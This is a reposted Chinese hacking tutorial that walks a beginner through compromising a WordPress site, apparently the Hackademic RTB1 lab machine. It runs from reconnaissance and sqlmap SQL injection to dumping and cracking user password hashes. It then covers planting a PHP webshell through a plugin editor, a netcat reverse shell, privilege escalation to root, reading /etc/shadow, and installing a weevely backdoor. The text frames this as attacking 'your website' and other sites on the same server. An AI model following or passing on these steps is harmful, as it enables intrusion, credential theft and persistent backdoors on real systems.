资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

栏目: 服务器 · Apache · 发布时间: 6年前

内容简介:现在我们获取了网站服务器的IP地址为:173.236.138.113

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

现在我们获取了网站服务器的IP地址为:173.236.138.113

寻找同一服务器上的其它网站,我们使用sameip.org.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们需要关于你网站的以下信息:

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们发现你的DNS记录如下

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

让我们来确定web服务器的类型

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.

我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们发现你的网站使用了著名的 php 整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看服务器上运行的服务)

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

2-Find server OS(查看操作系统版本)

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们也会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们输入要检测的网站地址,选择完整的安全审计选项.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

稍等一会,你将会看到扫描结果.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

发现你的网站存在 sql 注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我们通过 工具 发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

过一会你会看到

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

输入N按回车键继续

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们发现你的网站存在 mysql 显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

登陆wordpress的后台wp-admin

尝试上传php webshell到服务器,以方便运行一些 linux 命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

点击连接我们会看到

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

接下来我们尝试执行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来显示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(显示服务器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(显示内核版本信息)

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

执行完成之后我们输入id命令

id

我们发现我们已经是root权限了

uid=0(root) gid=0(root)

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

现在我们可以查看/etc/shadow文件

cat/etc/shadow

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

接下来上传到服务器之后来使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

测试我们的hax.php后门

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了

完成,撒花!

私信小编007 即可获取数十套PDF书籍!

资深黑客教小白如何攻破一个网站!超级详细的教学教程!太牛逼了


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

算法引论

算法引论

[美]Udi Manber / 黄林鹏、谢瑾奎、陆首博、等 / 电子工业出版社 / 2005-9-1 / 35.00元

本书是国际算法大师乌迪·曼博(Udi Manber)博士撰写的一本享有盛誉的著作。全书共分12章:第1章到第4章为介绍性内容,涉及数学归纳法、算法分析、数据结构等内容;第5章提出了与归纳证明进行类比的算法设计思想;第6章到第9章分别给出了4个领域的算法,如序列和集合的算法、图算法、几何算法、代数和数值算法;第10章涉及归约,也是第11章的序幕,而后者涉及NP完全问题;第12章则介绍了并行算法;最后......一起来看看 《算法引论》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

URL 编码/解码
URL 编码/解码

URL 编码/解码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试